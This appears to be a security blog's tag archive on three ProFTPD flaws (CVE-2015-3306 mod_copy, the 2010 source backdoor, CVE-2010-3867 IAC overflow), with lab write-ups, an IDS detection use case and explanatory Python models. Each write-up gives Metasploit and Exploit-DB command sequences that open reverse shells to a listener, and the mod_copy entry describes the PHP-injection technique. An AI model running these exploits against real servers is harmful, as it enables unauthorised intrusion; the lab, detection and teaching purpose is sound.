Tag Archives: ProFTPD

CVE-2015-3306 ProFTPD 1.3.5 Mod_Copy Command Execution

Timeline :

Vulnerability discovered and reported to the vendor by Vadim Melihow on 2015-04-07
Workaround provided by the vendor on 2015-04-07
Vulnerability details released on 2015-04-13
Metasploit PoC provided on 2015-04-22
Patch provided by the vendor on 2015-05-28

PoC provided by :

Vadim Melihow
xistence

Reference(s) :

CVE-2015-3306

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

CentOS 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands of mod_copy in ProFTPD 1.3.5. Any unauthenticated client can use these commands to copy files from anywhere on the filesystem to a destination of its choice. The copies are made with the rights of the ProFTPD service, which by default runs as the ‘nobody’ user. Because ProFTPD writes the command it is currently processing into its process title, /proc/self/cmdline of the session process contains the text of the client’s own SITE CPTO command: copying it into a file whose name carries a PHP payload writes that payload into the file body, and a second copy of that file into the web root gives PHP remote code execution.

This vulnerability is only exploitable under particular conditions:
– ProFTPD must be able to write into a web-accessible directory, i.e. the directory must be writable by the user ProFTPD runs as.
– SELinux must be disabled.

Commands :

ProFTPD is running with user and group “nobody”.
ProFTPD is configured with “LoadModule mod_copy.c” in the proftpd.conf file.
A “test” folder has been created in “/var/www/html/“ with nobody:nobody ownership.

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run

id

Done !

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible correlation(s) :

  • Pen-testing tools or home made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP content must contain “HELP ACIDBITCHEZ“, which is the command that opens the backdoor.
  • The traffic must come from any source port of EXTERNAL_NET towards port 21/TCP of HOME_NET.
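The two detection sources listed for this use case, IDS and FTP logs, run over constructed sample data. This is an added example and is neither the Emerging Threats rule text nor ProFTPD code; the HOME_NET ranges, the flow records and the log lines are made up here for illustration.

```python
#!/usr/bin/env python3
"""SUC028 / ET SIG 2011994 detection logic over sample data.

Added example, not Emerging Threats' rule and not ProFTPD code. The
HOME_NET ranges, flow records and log lines below are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable

# Assumed monitored address space (the rule's $HOME_NET); the rest is $EXTERNAL_NET.
HOME_NET = [ipaddress.ip_network("192.168.0.0/16"), ipaddress.ip_network("10.0.0.0/8")]

# The implant compared the HELP argument with strcmp(), so the match is case-sensitive.
BACKDOOR_TRIGGER = "HELP ACIDBITCHEZ"


@dataclass(frozen=True)
class FtpCommand:
    """One client-to-server line on the control channel, as an IDS sees it."""
    src: str
    dst: str
    dport: int
    payload: str


def in_home_net(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOME_NET)


def matches_sig_2011994(cmd: FtpCommand) -> bool:
    """$EXTERNAL_NET any -> $HOME_NET 21, to-server content 'HELP ACIDBITCHEZ'."""
    return (cmd.dport == 21
            and in_home_net(cmd.dst)
            and not in_home_net(cmd.src)
            and BACKDOOR_TRIGGER in cmd.payload)


def ids_alerts(commands: Iterable[FtpCommand]) -> list[FtpCommand]:
    return [c for c in commands if matches_sig_2011994(c)]


# ProFTPD ExtendedLog in its default LogFormat: %h %l %u %t "%r" %s %b
EXTLOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$')


def scan_extended_log(lines: Iterable[str]) -> list[dict]:
    """Parsed fields of every logged command that carries the trigger."""
    hits = []
    for line in lines:
        m = EXTLOG_RE.match(line.rstrip("\n"))
        if m and BACKDOOR_TRIGGER in m["cmd"]:
            hits.append(m.groupdict())
    return hits


# Constructed sample data (RFC 5737 address for the attacker).
SAMPLE_FLOWS = [
    FtpCommand("203.0.113.7", "192.168.6.154", 21, "USER anonymous\r\n"),
    FtpCommand("203.0.113.7", "192.168.6.154", 21, "HELP ACIDBITCHEZ\r\n"),   # external -> home: alert
    FtpCommand("192.168.6.10", "192.168.6.154", 21, "HELP ACIDBITCHEZ\r\n"),  # internal source: outside the rule
    FtpCommand("203.0.113.7", "192.168.6.154", 2121, "HELP ACIDBITCHEZ\r\n"), # wrong port
    FtpCommand("203.0.113.7", "192.168.6.154", 21, "help acidbitchez\r\n"),   # wrong case: the implant ignores it
]

SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2010:20:15:02 +0100] "USER anonymous" 331 -',
    '203.0.113.7 - - [01/Dec/2010:20:15:09 +0100] "HELP ACIDBITCHEZ" 214 -',
    '192.168.6.10 - bob [01/Dec/2010:20:16:40 +0100] "RETR pub/file.txt" 226 1234',
]


if __name__ == "__main__":
    for c in ids_alerts(SAMPLE_FLOWS):
        print(f"SIG 2011994: {c.src} -> {c.dst}:{c.dport} {c.payload.strip()!r}")
    for h in scan_extended_log(SAMPLE_LOG):
        print(f"FTP log: {h['host']} at {h['time']} sent {h['cmd']!r}")
```

Two points the sample makes: the rule as scoped here ignores an internal source, so a copy of the logic used for lateral-movement hunting should drop the EXTERNAL_NET constraint; and the FTP-log path is the weaker of the two, because ProFTPD writes the ExtendedLog entry after the command handler returns, and on a backdoored build that handler spawns a root shell first, so the line may only appear once the shell exits, if at all.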
SIG 2011994 1 year events activity

OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution

Timeline :

Public release of the backdoor presence on 2010-12-01
Metasploit PoC provided on 2010-12-02

PoC provided by :

MC
darkharper2

Reference(s) :

OSVDB-69562

Affected version(s) :

proftpd-1.3.3c archives downloaded between 2010-11-28 and 2010-12-02

Tested on Ubuntu 10.04 LTS with :

proftpd-1.3.3c with the backdoor diff applied

Description :

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between 28 November 2010 and 2 December 2010.

Commands :

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
ifconfig

CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Timeline :

Vulnerability reported to the vendor by ZDI on 2010-09-24
Coordinated public release of the advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in ProFTPD versions 1.3.2rc3 through 1.3.3b (fixed in 1.3.3c). By sending data containing a large number of Telnet IAC bytes, an attacker can make the control-channel line reader write past its buffer, corrupt memory and execute arbitrary code.
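To show why a run of IAC bytes overflows a fixed-size line buffer, here is a byte-accounting model of the reader. It is an added example and deliberately not ProFTPD’s code: a simplified re-implementation of how the reader tracks the space left in its buffer, with the pre-1.3.3c accounting and the corrected accounting side by side. Only the four option-negotiation commands are modelled, the buffer size is an arbitrary 64 bytes, and nothing here writes out of bounds; the function only counts what the real reader would have stored.

```python
#!/usr/bin/env python3
"""Byte-accounting model of CVE-2010-3867 (IAC handling in pr_netio_telnet_gets).

Added example, not ProFTPD's code: a simplified re-implementation of how
the control-channel line reader tracks the space left in its fixed-size
line buffer. Only IAC WILL/WONT/DO/DONT negotiation is modelled.
"""
IAC, DONT, DO, WONT, WILL = 0xFF, 0xFE, 0xFD, 0xFC, 0xFB
NEGOTIATE = {WILL, WONT, DO, DONT}      # each is followed by one option byte
LF = 0x0A


def telnet_gets_model(data: bytes, bufsize: int, fixed: bool) -> int:
    """Number of bytes stored into a `bufsize`-byte line buffer for `data`.

    Reading stops at a newline or when the remaining-space counter hits zero.
    With fixed=False an IAC that is not followed by a Telnet command is
    stored literally but not charged to the counter, so every such pair puts
    two bytes in the buffer for one unit of accounting.
    """
    remaining = bufsize - 1         # one byte is reserved for the terminating NUL
    stored = 0
    mode = 0
    for cp in data:
        if remaining == 0:
            break
        if mode == IAC:
            if cp in NEGOTIATE:
                mode = cp           # IAC WILL/WONT/DO/DONT: swallowed, nothing stored
                continue
            # IAC followed by any other byte (e.g. IAC IAC, the escape for a
            # literal 0xFF): the IAC byte itself is stored verbatim ...
            stored += 1
            if fixed:
                remaining -= 1      # ... and the fixed accounting charges for it
                if remaining == 0:
                    mode = 0
                    break
            mode = 0                # ... then cp is stored as ordinary data below
        elif mode in NEGOTIATE:
            mode = 0                # the option byte, dropped
            continue
        elif cp == IAC:
            mode = IAC              # possible start of a Telnet sequence
            continue
        stored += 1
        remaining -= 1
        if cp == LF:
            break
    return stored


def overflow_bytes(data: bytes, bufsize: int, fixed: bool) -> int:
    """Bytes written past the end of the buffer, NUL terminator included."""
    return max(0, telnet_gets_model(data, bufsize, fixed) + 1 - bufsize)


if __name__ == "__main__":
    flood = b"\xff" * 200                   # the kind of input the exploits send
    for fixed in (False, True):
        print(f"fixed={fixed}: stored={telnet_gets_model(flood, 64, fixed)} "
              f"overflow={overflow_bytes(flood, 64, fixed)}")
```

With the vulnerable accounting a 64-byte buffer receives 126 bytes from 200 bytes of 0xFF, i.e. roughly twice its size, while ordinary commands and real Telnet negotiations are counted correctly in both variants; that is why the trigger on the wire is simply a long run of IAC bytes rather than anything that looks like a valid FTP command.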

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig